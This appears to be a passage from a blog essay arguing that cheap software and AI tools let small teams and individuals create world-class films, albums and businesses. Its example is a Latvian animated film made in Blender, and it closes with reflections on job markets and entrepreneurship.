Let that sink in: 4-5 people in a small room in Latvia, led by a relatively inexperienced director, used free software to make a movie that as of February 2025 had earned $20m and won an Oscar. I know it's a bit more involved than that, but still: quite an accomplishment! And not a unique one. Billie Eilish and her brother Finneas produced her Grammy-winning debut album When We All Fall Asleep, Where Do We Go? in their home studio. And it's not just cultural works such as movies and albums: small teams have built hugely successful products such as WhatsApp and Instagram.

As computers and software get cheaper and more powerful, people can do more with less. And "more" here doesn't mean just a bit better (pardon the pun): it means among the world's best. And as services and products continue migrating from the world of atoms to the world of bits, creators' scope of action grows.

This trend isn't new. But with AI in the mix, things are about to go into overdrive. Zilbalodis and his collaborators could produce their film because someone else built Blender; they worked within its capabilities and constraints. But what if their vision exceeded what the software can do?
Just a few years ago, the question likely wouldn't even have come up. Developing software calls for different abilities. Until recently, a small team had to choose: either make the movie or build the tools. AI changes that, since it enables small teams to "hire" virtual software developers. Of course, this principle extends beyond movies: anything that can be represented symbolically is in scope. And it's not just creative abilities, such as writing, playing music, or drawing, but also other business functions such as scheduling, legal consultations, financial transactions, etc.

We're not there yet. But if trends hold, we'll soon see agent-driven systems do for other kinds of businesses what Blender did for Dream Well Studio. Have you dreamed of making a niche digital product to scratch an itch? That's possible now. Soon, you'll be able to build a business around it quickly, easily, and without needing lots of other humans in the mix.

Many people have lost their jobs over the last three years. Those jobs likely won't be replaced with AIs soon. But job markets aren't on track to stability. If anything, they're getting weirder. While it's early days, AI promises some degree of resiliency. For people with entrepreneurial drive, it's an exciting time: we can take ideas from vision to execution faster, cheaper, and at greater scale than ever. For others, it'll be unsettling, or outright scary.

We're about to see a major shift in who can create, innovate, and compete in the market. The next big thing might not come from a giant company, but from a small team, or even an individual, using AI-powered tools. I expect an entrepreneurial surge driven by necessity and opportunity. How will you adapt?

20 hours ago 2 votes